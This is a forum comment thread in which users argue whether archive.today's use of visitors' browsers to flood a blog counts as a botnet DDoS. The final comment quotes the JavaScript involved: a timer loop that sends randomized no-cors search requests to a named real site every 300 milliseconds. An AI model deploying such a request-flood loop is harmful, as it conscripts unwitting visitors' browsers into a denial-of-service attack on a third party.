The browsers of their site visitors.

croes · 2026-03-22T14:33:51 1774190031

If you need to be on the site it’s not a botnet and there is no C&C server coordinating the attack. It‘s just the JS on the site that makes the attack.

jojomodding · 2026-03-22T17:35:29 1774200929

> If you need to be on the site it’s not a botnet

Why? I did not visit the site to participate in a DoS attack; yet my machine was coaxed into participating against my will. Whether this is happening in JS or a drive-by download or a browser 0-day is irrelevant.

croes · 2026-03-22T17:44:08 1774201448

You did participate in archive.today’s DDoS without visiting the site?

How if it‘s JS code in the site?

Hamuko · 2026-03-22T16:47:50 1774198070

Does this mean that the Great Cannon of China is not a botnet because it stops working when you close your browser?

croes · 2026-03-22T17:42:31 1774201351

Does the Great Cannon of China coordinate the attacks?

Does archive.today?

Hijacking a software like the browser is something completely different to a simple JS on a website.

Hamuko · 2026-03-22T17:46:27 1774201587

>Does the Great Cannon of China coordinate the attacks?

Yes.

>Does archive.today?

Yes.

croes · 2026-03-22T18:09:50 1774202990

How does archive.today coordinate the attack?

fastball · 2026-03-22T19:01:31 1774206091

By telling visitor browsers to DoS the site.

croes · 2026-03-22T20:25:50 1774211150

That’s not really coordinating.

It’s just a website with a simple request loop, not C&C server tells when the attacks have to happen.

This doesn’t make your browser a bot

  setInterval(function() {
            fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
                referrerPolicy: "no-referrer",
                mode: "no-cors"
            });
        }, 300);